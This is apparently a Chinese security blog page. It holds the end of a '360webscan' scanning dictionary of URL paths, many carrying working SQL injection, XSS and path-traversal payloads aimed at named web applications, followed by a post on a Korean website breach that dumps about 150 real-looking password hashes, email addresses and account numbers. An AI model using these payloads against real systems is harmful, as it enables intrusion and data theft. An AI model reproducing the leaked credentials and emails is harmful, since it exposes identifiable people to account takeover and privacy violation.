/user/http/httpnews.php?type=html&id=1%20and%201=2%20union%20all%20select%201,@@version,3,md5(0x45154),5,6,7,8,9,10
/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
/user/storage_explore.php
/user/storage_fold_explore.php
/user/userzone/School/download.aspx?f=/config/ConnectionStrings.config
/usermanage.php?NodeID=-1%20UNION%20SELECT%201%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%23
/users.ini
/users.txt
/utilities.php?tail_lines=50&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1&filter=%22%3E%25%3Cscript%3Eprompt(42873)%3C/script%3E&page=1&action=view_logfile
/varset/modifyTime.asp?varname=&id=495'%20union%20all%20select%201,2,3,0x66696E643A76756C,5,6,7,8,9%20from%20teachers%20--
/vc/vc/index/que_index.jsp
/venus/AsVenusCA/desk/message/reply.asp
/video/videoView.jsp?videoid=250%20AND%201=(SELECT%20CHAR(106)%2bCHAR(58))
/viewlist.aspx?typeid=webscan()'
/views.asp
/viewthread.php?tid=250523
/viewthread.php?tid=31926
/viewthread.php?tid=8974
/vote.php?act=dovote&name[1%20and%20(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23][111]=aa
/voteresult.aspx?activeid=-1%20UNION%20SELECT%201,char(106)%2bchar(106),3,4,5%20from%20syscolumns%20--
/wap.php?pageBody=%3Cscript%3Ealert(42873)%3C/script%3E
/wap/index.php
/wap/index.php/admin.php?c=job&pr=-1%20UNI00000000ON%20sel00000000ect%23%0amd5(0x4141),1,md5(0x4141),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%23&hy=%0a,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%23&num=&exp=&edu=%0a%20fro00000000m%20phpyun_admin_user%20limit%201%23&type=&uptime=
/wap/index.php?ac=search&at=taglist&tagkey=a%2527
/wap/index.php?ctl=synclogin&post_type=json&login_type=Sina&from=wap&sina_id=-1'%20union%20select%201,2,concat(0x7c,md5(1122),0x7c),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72%23&code=1
/wap/index.php?keywords='and((select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))and'&mod=search&page=2
/wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
/wap/index.php?mod=search&keywords=%df')%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/wap/index.php?mod=space&userid=1'%20and%20extractvalue(1,(select%20md5(1122)from%20my_admin%20limit%201));%20%23
/was5/admin/
/wc.db
/wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
/web-console/
/web/?id=-1'
/web/User_Sort_List.aspx?infoid=2%20and%20char(106)=0
/web/common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd
/web/doc_hit.jsp?documentid=-21%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
/web/server/serverstart.php?machineid=1%27%20and%20%28select%201%20from%20%28select%20count%28%2a%29%2Cconcat%28md5%280x221%29%2Cfloor%28rand%280%29%2a2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
/web/systemconfig/guangboinfo.php?id=1%27%20and%20%28select%201%20from%20%28select%20count%28%2a%29%2Cconcat%28md5%280x221%29%2Cfloor%28rand%280%29%2a2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23&from=list
/webConfigSet/configSetting.aspx?url=/login/index.aspx
/webSend/entity_show.jsp?unid=-1'%20or%201=2%20--&fileName=webscan.jsp
/webUser/webUser!list.action
/webadmin/
/webeditor/admin/
/webfm/webUI/uistrings.cgi
/weblogin/
/webmail/main/searchAddr.inc.php?value=123%25%27%29%20union%20select%20concat%28tm_name%2C0x23%2Ctm_domain%2C0x23%2Cmd5%280x4141%29%29%2Ctm_passwd%20from%20todaymail%20limit%200%2C1%23&ftm_id=103361
/webmanage/
/webmaster/
/webscan360noThisFile*~1*/.aspx
/webscan_360_cn.html
/website/approve/approveSiteAction!findApproveGuide.action?businesscode=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&location=&subcode=000
/website/approve/approveSiteAction!listApproveModel.action?action=search&forward=searchmodel&issueTypename=&style=4&subType=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
/website/approve/convenientSiteAction!getSXList.action?department=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&mill=488&style=4
/website/dflz/dflzCjAction!caiwugk_list.action?orgCode=&orgName=&zuOrgCode=&zuOrgName=&cwgkbbh=-21'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--%20&cwgkbmc=
/website/level3.jsp?tablename=7&infoid=-1'%20UNION%20ALL%20SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29--
/webusr/check.aspx?loginname=nosec'%20and%201=char(106)%2bchar(106)%20--%20
/wei/js.php?type=like&keyword=1%2527)/**/UNION/**/SELECT/**/1,concat(0x7e,0x7765627363616E3A693A66696E64,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23
/wescms/sys/order_adjust.php?id_f=1&order_f=2&id=3&dir=up&table=%28select%20count%28%2a%29%2Cconcat%28%28select%20md5%280x7765627363616e%29%29%2C0x7c%2Cfloor%28rand%280%29%2a2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a
/witapprovemanage/apprvaddNew.jsp?flowid=%27%20and%201=2%20UNION%20SELECT%201,2,3,4,char(106)%2bchar(60),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29;--%20-
/workflow/OfficeFileDownload.aspx?filename=1'%20and%20(select%20char(106)%2bchar(106))%3E0%20--
/workflow/flow_details.aspx?action=details&job_id=-12%20and%201=char(106)
/wp-admin
/wp-admin/
/wp-config.php.bak
/wp-content/
/wp-includes/
/wp-includes/registration-functions.php
/wp-includes/registration.php
/www/index.php?mod=admin&con=deliver&act=view&deliId=(select%20char(106)%2bchar(58))
/www/index.php?mod=admin&con=user&act=view&id=(select%20char(106)%2bchar(58))
/www/index.php?mod=admin&con=user&act=view&username='%20and%20(select%20char(106)%2bchar(58))=1%20--
/www/item_seach.php?tempsql=and%201=2%20UNION%20SELECT%201,2,concat(0x7c,md5(1122),0x7c),4,5,6,7,8,9,10,11,12,13%23
/wywzlist.aspx?OUGuid=1')%20and%201=char(106)%20--%20
/xampp/index.php
/xampp/showcode.php/showcode.php?showcode=1
/xyEmployee_checkLoginForUser.do?userName=reer
/yhzc/NewFile.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yhzc/isFlag.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yhzc/isPass.jsp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yp/job.php?action=applylist&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
/yp/job.php?action=list&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
/yp/product.php?pagesize=$%7B@print(md5(42873))%7D
/yp/product.php?q=&action=searchlist&where=%23
/yp/web/index.php?userid=999999999999999999999999999999999999&menu=die(md5($_GET%5bscan%5d))%3b&scan=webscan
/yushouli/yushouliResult.do?item_ID=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=SAVESIGNATURE&SIGNATUREID=1&DOCUMENTID=1%25%27%20AND%20%28SELECT%209745%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%280x7175767971%2C%28SELECT%20%28CASE%20WHEN%20%289745%3D9745%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716a656571%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27%25%27%3D%27
/yyoa/common/js/menu/initData.jsp
/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20database();
/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20md5(0x4111);
/yyoa/common/js/upload/modify.jsp?showPic=%3Cscript%3Ealert(42873)%3C/script%3E
/yyoa/ext/https/getSessionList.jsp?cmd=getAll
/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=%281%29%20LIMIT%201%2C1%20UNION%20ALL%20SELECT%20CONCAT%280x3a6f70723a%2C0x4965736f7844706c6b4f%2C0x3a716e7a3a%29%23%29
/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=(1)%20UNION%20ALL%20SELECT%200x43453B443A4152%23
/yyoa/ext/trafaxserver/SendFax/resend.jsp?fax_ids=(1)%20UNION%20ALL%20SELECT%200x43453B443A4152%23
/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=1'%20UNION%20ALL%20SELECT%20NULL,0x43453B443A4152,NULL,NULL%23
/zabbix.sql
/zfcgFrame/xx_look.aspx?ID=-1%27%20UNION%20ALL%20SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29--%20
/zfsmp/sjksz.do
/zhanshi/equzhanshi.aspx?equid=-301'%20and%201=char(106)%20--
/zhanshikebiao.aspx?centid=-301%20and%201=char(106)%20--&date=&xyid=
/zhanshikebiao.aspx?centid=-301'%20and%201=char(106)%20--&date=&xyid=
/zhuti/360webscan'
/znSearchAction.do?searchContext=-1%25%27%20UNION%20%20ALL%20SELECT%20%20NULL%2CNULL%2CCHR%28119%29%7C%7CCHR%28101%29%7C%7CCHR%2898%29%7C%7CCHR%28115%29%7C%7CCHR%2899%29%7C%7CCHR%2897%29%7C%7CCHR%28110%29%7C%7CCHR%2858%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28100%29%2CNULL%20FROM%20DUAL%20--
/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
/zplug/lib_xxx.php?code=huiwen_opac
/zwfw/zwfwInfoAction!execute.shtml?action=5&sid='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
/zwgkinfo/DepartMentInfoList.aspx?CategoryNum=-12'/**/and/**/1=char(106)--&DeptCode=
/zxts_view.aspx?Id=4%20and%201=char(106)%20--&GBType=1
/zy/resource/fileSize/canUpload.do?folderId=document&userId=-12'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x23,(SELECT%20md5(1122)),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20and%20'a'='a&spaceName=&totalFileSize=74126
/zyjs.asp?Txy=18&tzy=11'%20/**/and/**/1=char(106)%20--

from

The post 360webscan字典 网站检测 目录漏洞扫描 appeared first on 🔰雨苁ℒ🔰.

韩国网站数据泄露 387个暗网网址

韩国网站数据泄露

泄露网站 www.enanoit.co.kr

 为什么那么多数据泄露? 尤其是在中国,什么都要实名认证,电话注册,注册个垃圾网站还各种公民信息都要,你是魔鬼吗?这些信息给了你你却不能好好的保存,妈的智障!全部匿名注册多好,数据被黑了也没卵用,现在这些泄漏的数据,什么都清清楚楚的,何谈隐私保护?

site:https://www.enanoit.co.kr

pw
email
cyber_acc
used


*0E73435262AC422F8FCF20398AE98A2F0F4096D4
pelogvc@gmail.com
08203236197796

*B22ED38E2EED1BA87857F754A4E9A684BE85D5C1
zerg@live.co.kr
08203236197807

*70B9ED7F5A4DD6DB92009E54DD806875DE43E10D
5128561@naver.com
08203236197814

*F0E6CEBF5CADA82C334A9DBC2C78088B1BC29FAA
rlaejdnjs@naver.com
08203236197821

*F62A7D614E3AA60D0BD7C346A8B334CA7DFE3858
seon036@naver.com
08203236197839

*745EDBC72E6442031B7B89FC0B85F01519B0CAD3
doomgate17@naver.com


*A3D6BCFC5067A0253BDFDEE381968058CA1E4234
rkcmdh1@naver.com
08203236197853

*67DF7AF51AD403C438E704185AAF7B7A2A0C78AE
tlsgks369@naver.com

*45D205638B8138E93F70CC927AFE7329E11FEAD4
sung-ho40@hanmail.net

*F828D33B8B71850DDFC9428BCF13D2EDE34F61B4
rhatmxk02@naver.com

*2EFF99ABBD6A399DA01D3C8CADA5A0E1B0B76A6F
linwins@nate.com
08203236197369

*43A0EC74DA033472A7AD70D5031BECC92D8A88BB
naver.com

*BCB4C5B2B752DFF21491FA06C857D483BA54D288
gaja7421@naver.com
08203236197861

*EBF36ECCFC6ED401EA34F93C0D7B668F6C5293C3
marine8131@nate.com
08203236197878

*5924A4FD5FF0B0DF2080A35C98B6F97678E7B2C9
dannum@nate.com
08203236197885

*84B6A07BB42A35A7D22F9F68A8CA26F5336788C9

08203236197892

*0F87937B58C912ED69612F1B6D6135C8D80C1CAE

08203236197732

*684EBE97254FC2D3433B118FC60FD64BAE5E7624

08203236197903

*F8D0CD8E3CB71E4097512E7E9EA0C27FD0E72E0E

08203236197911

*F5FF85B2BC22E7C2A0A9EE5FA7FEE4B0FBEEB797
yskvv@haanmail.net
08203236197928

*F99B69F588993803443A3421A81A94EF4AF7E39D
sky2@enanoit.co.kr
08203236197419

*94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
iwebkr@test.co.kr

*FE725BA48776C1DA8D27B4A96DCBCCE291D42C42
gkthdnd@hanmail.net

*92424ED96402E1C0BBC94DC88040931E438D29EC
blackand12@Naver.com

*5B899B27C5C5A505B223B0A9370EF01A1F139AE5
ldw370@hanmir.com

*77810AC411E75D67E0238B52D1F53B34E388BC99
tlsehdals@naver.com

*51D1E3BDF3BE402DDF4E75D340C0D7D0E32717D3
acomma1229@gmail.com

*B59A7890066A44A5DE2340681EC055211A6CFFAE
sunkai@konkuk.ac.kr

*C5A4054557F4B3A5E6F86D3CFD5E6A543D3CD623
dlems2032@naver.com

*2A82BFB408CDE39EC5D964696B55CB25A327514F
emipas@naver.com

*A6A516584C585266D6DB3CE53C8AB99BE2A2E458
best254@naver.com

*5E022CD9BCF8F99FF6945652145EE4C21C508C2E
kimhuen220@naver.com

*DC7C481A5F8C04431B646BAB2EE9EB20C8C38CA5
gmchaos@naver.com

*45E10F4A6A5307A0D3D5D32DD07AE27F4445E78D
shina_two@naver.com

*EDCC29011E26E197C636F4C48652461B6216609E
sollo0101@naver.com

*B37D7E7E0C6B4A5F728A1D1FA8A61CC99CB46404
kflying@enanoit.co.kr

*0B47C998698C4B8529EBE19717F7DB710839AE26
www.dhdgkpp1.com

*984F62FE3A7906BFBC12D1268ABF6F8981BBC224
dnqls111@hanmail.net

*A4B6157319038724E3560894F7F932C8886EBFCF
rkdus2841@nate.com

*70A3FE98ED4A53A78246FD049718121204A90EFD
pok_jhs12345@naver.com

*185B11C0CCE0A8A080BA0A507BBE6BF1545D929C
choju1130@nate.com

*F6319239870C28EE99E5913C6A325A09EB10C4F7
jsnono12@naver.com

*B2C663FB87E4D965D6674030CCB0886F98F5236D
kss5723@naver.com

*2D93BF6F095AF3A476E61D44E35CB52B628EA994
admiN@bbimt13.net

*6B36958F802D3DD3732B9ECE794CE9AD07E2F8E4
admin@sunhao12.com

*686D8DE0F98062A22EC0994A90DA3211CF5FD5E6
sky-1981@hotmail.com

*6803969FF593428D9554BFB595CBE67DCAA445D4
dhfldl@gmail.com

*A8BEFAB2C63C11200B91EC216D24FDC9585FAA72
rlxoflslwl11@naver.com

*543E8C4D9ACDA686D444C6131E8019FA4AA105FA
sangjo4@naver.com

*8C0C76A722DA96F22451E7799BE7C6CFFFB2A438
jjw02399@naver.com

*55C8A7F6A5AF1B3BC3B81FC872D3D98D9317B06A
2__li_n_a@naver.com

*FAC70BFFD2DA5AE2D97028772EF3974D55E25C78
amonduul@naver.com

*2C134DD27582163219D2C1537772A723C3AB31EE
eks110@nate.com

*95362C1822278E6E3F8B02B78032855BF9E95DF5
pyh4775@hanmail.net

*D42298190CF9EF7DC3CC8F9CD92068899245D9A3
managerlsb@hanmail.net

*3BAFEC338BAD702D208FCAB2F1F2F98DC1464D72
fgfdg@dfsdff.net

*02735234DF217B099A4835C8E0B6A360D52DD415
smtm1000@nate.com

*E06180D8946E4546FDCBFEE3C47FDC0D05C9C3C8
hoony1048@naver.com

*DF5741E5B26EDDF9EA012775349FCDD529EC0ED5
ehdcjfl486@nate.com

*D53DAFFAFA52871654FAD5617D768669BA3B8C74
in0ter@naver.com

*0A10FBFCC1D7251BF74AE268E5FF70F331B632D6
pbh1105@naver.com

*3BB2D296231F8EC088113BD6B588E65A304C1618
kss2740@sunhao12.com

*4981B441D110FEB1ECC57A5B12AF44F39DF1F08A
ka123@naet.net

*94B2528EE73FDF5120C93DA0BD4BE33CD46F5A25
goldtip72@gmail.com

*D36C0288C6B696D4EA95AED5A9F5784F9679A4B3
h0use@naver.com

*E8A0353B56591CD7F5924250C98AB7141B5BE64C
you__ok@naver.com

*DFE51F930D7E9D4A53129EBDA2482B05E330E333
pjw1406@naver.com
08203235997828

*80930F2DF72A04EA898E7BB14988D7F1D8ED8EBE
pallx@hanmail.net

*71314EFC03EC83C7098975354DC5C5AC9C6F9D9B
userinit@nate.com

*FCD90EC3985BF9253E744DDAA5A1E518C8037937
kug@enanoit.co.kr

*A5961556BE63A25659827FDA40B1E567B537B0EA
s_____m@nate.com

*574CD4BD2A499C1D46463DE2583723E95DBEE676
zmfldp123@naver.com
08203235997850

*3BFDCEFA9636CFC025AD2A3654366935EA8EF430
lcq0104

*5CA77B0002EE132AEEFE2F0116AD40EC557DB056


*4EEC883C8EE98EEF794ACA81D35CCB2E167F7E07
samgook114@nate.com
08203236097326

*3D4A65A196F190A1B571CBBE50EE4B2F6DCE0D69
slki00@paran.com

*63442620C941DE6215447D9D826C338974032323
towar123@nate.com

*368647DF04AD6B31A1236DE9DD6C5BC50371AC5A
chamundararpg@nate.com

*A58B7A2DFC6A5F34066852D045C451570029C4A4
alsgh6033@naver.com

*3D949FE0956FDA71E6BA3839EEDE75D4C5B9B5DE
cjdeoans10@naver.com

*712B69033BB2C08B8E1243774687F3DE968DBBF4
wmr05529@naver.com

*28E50339C1EE0D1719803CD4CB35759303B7D633
azxcs3@nate.com

*51F206DD72E22FFD79E5F3DA340A330F2ABB3F14
sun5259@naver.com

*A80C8DEBF24EB9FEE807BDCAAA55F76482806EFB
ms_handsome@naver.com

*67CC22C8C310CD0A3F4D23C9DF80DB8DFE93390F
dafafw@awf.com

*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
rkwk@naver.com

*820BC565F1648637E96BB5BAC98F559883AB5F02
lds7913@hanmail.net

*F03C092347181DEA76E3F4FD6DD6A5E608721BC1
dopani@brainclan.com

*2AA92234E2C91AC9A82C0A17305236350F0080E9
best_kr@naver.com

*B5B5D09566E7DCD953DA6E6356B9A4249343A777
qee0@naver.com

*A9DF534A67E513E45A33FAB5F8006876B6A6E70D
fuuhaa3@naver.com

*0BBDBF6F2AAAE9CD2E1BA059F28C119BB0BADE1A
ajtwoddl1226@naver.com

*A4B6157319038724E3560894F7F932C8886EBFCF
lovesick88@naver.com

*2D5C5DF0AC7C201FCB0B5AE70578AAAF5AB0FB00
rbtjrdua@naver.com

*728E6DC94BE98A75180B9355C87E04A7ACCC3C36
qwaszx2003@paran.com

*4AFD223D2ED69274D1A87400E99596F452EFA140
ysmysm3@naver.com

*A93CAA489E625FBF80229830ECF457FF1EFA2BE7
yjk8978@hanmail.net

*E5F2614C05BA3630C4FC2ADB4E2D96BB67BA14E0
hojin0516@nate.com

*22BF8B00D1F8E8A6FE88C67EE6A48C91C3CCE93F
rlqordlekd@naver.com

*A312A25D11A18A1207A7436CAA3E97E7111FDF60
zxasdc5@hanmail.net

*A257D1BF31F75155F488B1F45D70B95DCFB9906A
say4m@daum.net

*B4FE4D945DE6515ADBB85508D6C0D7425828B2FF
o_mnipotent_@naver.com

*BA7175A06C8CDFA7E4961F926FB0AD736F72EEFC
tun_makin@naver.com

*38821420F44D5FDC398358D7EA8995932ECC752A
dkak3434@naver.com

*AEABADD50CC9D5C01E41D226F1251FF7FBC42C8B
cjdwndntlwkd@naver.com

*1A9FE5915FE512D6BB29B92DF42C819B241093A1
faceadm@naver.com

*797F5B3B6A22259F194DD960BE15A3D2E2D6D0E9
theguard@nate.com

*89CB993139D27CED73DC34407B0384E3C5438CC5
hot7415@hanmail.net

*3EFA523597602AE93167BBAA85784FAC2C252E6F
line_______@naver.com

*8D9F6EDA34A381499BED0A1682157EA9AFBD77BB
smr@naver.com

*7C932D9592C405F9AEE2BB421B78DD75E7E79F47
wnsdud4479@naver.com

*0625C6B7FC85691CA90D39A06E620FED9C079CD2
jesskiki@hanmail.net

*333044DD598B8FD5F37AEDC9056943E60325024D
tooi969@naver.com

*778CBC28961CA6551A469BB6B6D3DF706E84FBFD
saer21@nate.com

*C46BDF033BE9EEAF2D005D96F89D780786D560C6
dnjswns900@nate.com

*32CACBAA1B70A4145AF20A5FC68879CF86C9D013
yep68@naver.com

*D7096F98DF0506CEDA37ACF4CCA8C4C16E6DE462
sictopia@nate.com

*BC3010E728C11F9E070AA2269059045DBF79E111
ggghhhjjj@nate.com

*E86B6FD1C6FE2F23C0D815DB16B127E8FD4F1CCF
sinhwa151@naver.com

*BBCAE25DAC02B3C2F287095F07A58AA7F2780982
percenta77@nate.com

*A1113D3BE0C58B23AB5D5FD90056F56A1626D53B
mir0512@naver.com

*D7096F98DF0506CEDA37ACF4CCA8C4C16E6DE462
sysnzl123@naver.com

*A0EA4AA6D09518CD978465EE7D54FCB13BBF9397
brand__adm@naver.com

*641444A168C60C789B3864F2ECBD1BAE3C1A1810
rweafd@naver.com

*4F1AB2BBF6479E9DDE9A2AFCCD94F8AA12ED1061
kstok00@naver.com

*320E98B5FD3478244F26D233B139F2CF09A4FBB8
lsylsy1@hanmir.com

*53F36AE5B1AB0249FDCE57DB08AD9B093C244948
whitejun99@naver.com

*5E469F885535F10962A8A69CA47FE8367BFB81E4
doan0105@naver.com

*0B0D8D5030E96AA354F80ADC44A8DC9E41267ED8
seodongin11@nate.com

*8835E42E31D677FC03794C394FCB6B95833FA2E0
camus0617@naver.com

*0FFF5B17B1CF46F033FDFB578F44D4CDD136866F
kasia__adm@naver.com

*4E44AB47086F19B0B11CECA6273231945AB29063
alcestzoey@naver.com

*2686C6E4FAF6123D097E54F6A6426FD69A1CFBE6
wnsdud44789@naver.com

*C07826A9DDE5B9CCAA2D5750F1E0A74A74906560
game4528@naver.com

*41F66D3C50D9DC3EC873525933A27D8F4F8083F0
yang0022@hanmail.net

*F8D156461399B7B8154000FB1DF806B59693FA7F
koseal1029@naver.com

*DA719EC28328C879A582707D47FF98A9DCE9571C
fkxj15@naver.net

*25EC925C86EF55A4338E9582371282237AFCACB4
gmltjr1313@naver.com

*270A2DF111734C312B37429D01BC4BCEA2E99696
nell_tive_@naver.com

*824D1B3071D4F0DC226585ACE16D46DD9B9FFB7E
akdsus@nate.com

*CBEA66B9817A5B47D5B659A53D4E9E727D5B738B
diaelfs@naver.com

*015146EEE4868DD38A2BAC1394A69C1C3911F142
gsm03255@Naver.com

*AF9E401053BFD00561228986403E690437876F9F
8124eve@hanmail.net

*0F0514B0E5E5B1899E8A12B866DBF97744F4A845
skl219@naver.com

